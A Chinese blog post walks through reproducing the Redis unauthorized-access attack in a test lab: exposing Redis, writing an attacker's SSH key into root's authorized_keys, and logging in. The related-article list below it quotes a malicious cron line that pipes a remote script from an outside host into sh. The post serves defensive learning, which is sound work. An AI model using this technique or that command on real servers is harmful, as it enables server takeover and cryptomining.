Redis被攻击纪实

最新推荐文章于 2024-05-15 11:40:15 发布
最新推荐文章于 2024-05-15 11:40:15 发布
阅读量445 收藏
点赞数
分类专栏: 存储 文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76787421/article/details/134294719
版权

一、前言

声明:本文仅供技术交流使用,严禁采用本文的方法进行任何非法活动。

上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis被攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。

二、被攻击机器环境搭建

IP: 120.55.95.55OS: Linux CentOS7.6     Redis5.0.9

1、编译安装Redis

注:需要安装tcl,并且在编译时指定MALLOC=libc,否则会各种报错。

2、修改redis.conf

#bind 127.0.0.1protected-mode nodaemonize yes注:这里以非保护模式启动Redis,Redis4.0以后版本对安全有所加强,默认安装好后不将保护模式去掉,远程是无法连接的。

3、启动redis 

./redis-server ../redis.conf

三、攻击机器环境搭建

IP:118.178.255.158OS:Red Hat Enterprise7.9

1、安装Redis客户端

2、测试Redis连接是否OK

redis-cli -h 120.55.95.55

四、进行攻击

1、生成本机公钥

ssh-keygen

2、将公钥文件写入Redis

注:第一步将公钥文件公钥内容前后分别加上两个换行,否则上传的公钥无效,第二步将处理后的公钥内容设置到Redis Key为crackit中去。

3、将公钥写入authorized_keys文件

注:上面语句用于动态修改Redis数据存放路径及文件名。

~/.ssh/authorized_keys内容如下

注:数据文件中本来key和value是连着的,但我们写入crackit的值时加了两个换行符,这样公钥不会被key干扰,就是有效的。

4、使用自己的私钥登录被攻击机器

ssh root@120.55.95.55

然后你想做什么都可以了。。。。

五、真实案例

1、2017年时候测试环境安装的是Redis4.0版本(或者更低,记不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?),当时只截取了Redis被注入一段代码。

2、刚申请的测试机120.55.95.55立马被其他人黑了

机器Load

Redis被注入:

注:忘记截屏了,重启了Redis,那个注入的key找不到了

信任登录被加了其它公钥

注:这台机器先放着给他用两天,有空再观察一个情况,今天还要做系统发布。

菜爷面馆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SpringBoot + Redis 以及在工具类里注入 Service(Redis
LinzhiQQQ的博客
12-02 3892
现在的场景是需要做 token 验证,那么用户退出登录之后,我们给他设置一个新的 token,然后当用户拿着已经注销了的token再进行访问验证时,到 Redis 里查看对比两个token是否一致,如果不一致说明token已过期 所以现在我们需要在 验证 token 的 Class 里面使用 RedisService 从数据库里拿出 token 做对比 由于工具类是 静态的方法,并且也不是 c...
redis攻击还原
10-05
此文档说明了redis攻击的原理以及预防的措施 简单来说就是不要用root运行 可以设置密码 可以设置防火墙规则固定ip访问相关端口
redis受到攻击
weixin_40083227的博客
05-03 422
今天被挖矿软件不小心植入脚本了,导致云服务器100%的CPU占用,被迫当肉鸡。原因是redis的默认端口没有改,也没有密码,就被攻击。 解决方法是 sudo kill -9 10053 && sudo userdel redis 必须要同时执行,这个脚本会自动唤醒,删除redis用户后,找到异常的脚本文件删除掉。然后卸载redis,sudo apt remove redis ...
Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 1896
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
云服务器上Redis数据库攻击实录+总结
最新发布
青衫客36的博客
05-15 1106
通过以上步骤,可以详细了解攻击过程,并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键,确保只有受信任的用户能够访问和管理服务器。计划任务格式:计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径:攻击者将 Redis 配置为将数据持久化到cron计划任务目录,如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用:通过 Redis 的SAVE。
Redis攻击Redis安全性)
Beyonderwei的博客
10-28 2139
文章目录一、简介二、设置密码 一、简介     默认Redis没有开启密码,因此需要我们进入后设置。如果没有设置密码就很容易会被攻击到,导致数据丢失,被植入其他内容。被攻击后写入了一些其他内容如下: 查询一下某一个键的内容为如下形式:(不是很懂,应该被植入了一些脚本文件) "\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t" 二、设置密码 常用命令: config get requirepass # 查询获
记一次小小的redis攻击
南浦
02-03 2075
一次redis攻击
服务器 redis 被入侵
beyond__devil的博客
09-04 823
这几天服务器上的 redis,出现了一个比较严重的问题: 程序返回错误: MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled. Please ch...
Windows版 Redis 5.0.14
04-10
Redis 是一个开源的内存数据结构存储系统,常被用作数据库缓存和消息代理。在Windows环境下,Redis 的安装和使用与在Linux系统中有所不同。这里我们将详细讨论Windows版Redis 5.0.14的相关知识点。 1. **Redis ...
Redis7.0.11版本安装包
03-15
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)和zset(有序集合)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更...
redis7.2.3-windows
11-15
Redis是一款开源、高性能的键值对存储系统,常被用作数据库缓存和消息中间件。在Windows环境下安装和使用Redis可能与在Linux等操作系统上有所不同,但其核心概念和功能保持一致。这里我们将详细探讨Redis 7.2.3在...
windows下的redis压缩包
03-22
Redis是一种开源的、基于键值对的数据存储系统,常用于数据库缓存和消息中间件。在Windows环境下,Redis提供了一个方便的压缩包,让用户能够快速地在Windows操作系统上部署和使用Redis服务,无需复杂的安装过程,...
记录Redis和MySQL被扫描注入攻击
qq_44610529的博客
08-05 1283
no 弱密码
redis漏洞被攻击
dwdqsa的博客
03-05 585
redis在无密码 且无bind情况下 黑客可以拿到root凌晨四点 服务器被攻击 之后服务器内存一直被udevs占满,疑似挖矿进程,删除会自动恢复去掉执行权限 chmod -x 后 杀掉进程 服务器正常...
redis 安全漏洞导致服务器被攻击
Golden_lion的博客
03-01 3894
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
【实战记录】记录服务器遭到攻击全过程(Redis漏洞)
qq_41997592的博客
02-13 3436
第一次面对服务器攻击全过程,由被动到主动!!
Centos上由于redis漏洞被攻击
半僧
12-06 1755
早上一直收到腾讯云报警,查看了下: 有个yam程序,占用大量CPU!!! 真他娘的纳闷,我服务器跑了什么我还不清楚?于是乎开始查哪来的? 于是我去百度了下 jyam -c x -M stratum+tcp 果不其然确实有这样的攻击,网上说这个攻击是由于redis未授权登陆漏洞引 起导致黑客利用的结果我去redis 控制台登录一看固然有个莫名其妙的key 刚好这个key 就是ssh的
Redis端口被占用
04-25
Redis端口被占用时,通常是由于其他进程或服务正在使用相同的端口。这可能是因为Redis已经在运行,或者其他应用程序正在使用相同的端口。 要解决这个问题,你可以尝试以下几个步骤: 1. 检查Redis是否已经在运行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值